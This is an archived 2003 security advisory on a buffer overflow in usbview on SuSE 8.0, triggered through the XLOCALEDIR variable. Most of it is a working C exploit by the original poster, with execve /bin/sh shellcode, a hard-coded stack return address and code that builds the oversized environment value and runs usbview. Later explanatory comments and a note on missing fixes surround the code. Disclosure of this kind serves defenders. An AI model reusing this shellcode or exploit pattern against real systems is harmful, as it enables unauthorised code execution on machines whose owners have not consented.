6th Apr 2003 [SBWID-6115]
COMMAND
	Usbview exploit
SYSTEMS AFFECTED
	Usbview on SuSE 8.0 (at least)
PROBLEM
	From a post by Serkan Akpolat [[email protected]]:
	
	+-------------------------------
	/* Proof of Concept Code for buffer overflow vulnerability in usbview
	-----------------------*/
	/* usbview uses the xf86 libs, which contain an unsafe string copy, as
	explained in oC-localX.c ---*/
	/* A long string in the XLOCALEDIR env variable causes a segmentation
	fault------------------------*/
	/* Usbview, which comes with SuSE 8.0, isn't setuid root by default, so the
	overflow crosses no privilege boundary there ---*/
	/* This code has been tested in SuSE 8.0
	------------------------------------------------*/
	/* It spawns a shell with the uid of the user who runs the
	exploit---------------------*/
	/* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr
	team.----------------*/
	/* Rooting Sabotage Forced, turevleri ve ayakci takimina: Basit
	bilginizle------------*/
	/* insanlari kandirmaya calisarak bi yere ulasamazsiniz.(Siz ing.
	anlayamadiginiz ---*/
	/* icin turkce
	yazdim.)-------------------------------------------------------------*/         
	/* Written by Serkan Akpolat For Fun [email protected]
	-----------------------------*/                                                 
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/types.h>
	#define BUFSIZE 6000
	#define PATH "/usr/bin/usbview"
	#define PROGNAME "usbview"
	const char shellcode[] =
	        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
	/* execve /bin/sh                                           */                  
	/* Shellcode from "Buffer Overflow" paper of Murat Balaban */
	/*
	 * Proof of concept: builds an oversized XLOCALEDIR value and then runs
	 * usbview with it in the environment.
	 *
	 * Per the header comments, the root cause is an unsafe string copy in the
	 * xf86 libraries that usbview links against, not in usbview's own code, so
	 * the fix belongs in the library's handling of XLOCALEDIR.
	 * For triage, the visible artefact is a process started with an XLOCALEDIR
	 * value of several kilobytes, which is far longer than a directory path.
	 * The header also states that usbview is not setuid root on SuSE 8.0, so
	 * the resulting shell runs with the invoking user's own uid.
	 *
	 * Takes no arguments. Nothing is returned explicitly; control only reaches
	 * the end of main() if execl() fails.
	 */
	int main(void)
	{
	        char *envv=NULL;   /* unused */
	        char buf[BUFSIZE]; /* becomes the XLOCALEDIR value */
	        int i,j,ret;       /* j is unused */
	        int *ap;   
	        /* View buf as an array of ints so it can be filled a word at a time. */
	        ap = (int *)(buf);
	        /* Hard-coded address that the message below reports as the payload
	           location.
	           NOTE(review): a fixed stack address presumably matches only the
	           tested SuSE 8.0 layout; stack address randomisation or a
	           non-executable stack would be expected to defeat it (confirm). */
	        ret = 0xbfffe86f;
	        printf("Shellcode is on 0x%08x , Press Enter For a Shell\n",ret);
	        /* Fill the first BUFSIZE-4 bytes of buf with copies of ret. */
	        for (i = 0; i < BUFSIZE -4; i += 4)
	                *ap++ = ret;
	        /* Overwrite part of the fill, starting at offset 4, with the payload
	           bytes (the terminating NUL is not copied). */
	        memcpy(buf + 4, shellcode, strlen(shellcode));
	        /* Export the buffer; the final argument 1 replaces any existing
	           XLOCALEDIR value. */
	        setenv("XLOCALEDIR", buf, 1);
	        /* Wait for Enter, as announced by the message printed above. */
	        getchar();
	        /* Replace this process with usbview; execl() passes the current
	           environment, including the XLOCALEDIR value set above. */
	        execl(PATH,PROGNAME,NULL);
	}
	
SOLUTION
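	? (no fix is listed in this advisory; per the notes above, the unsafe copy is in the xf86 libraries that usbview links against, and usbview is not setuid root by default on SuSE 8.0, so keeping it non-setuid limits the impact to the invoking user's own privileges)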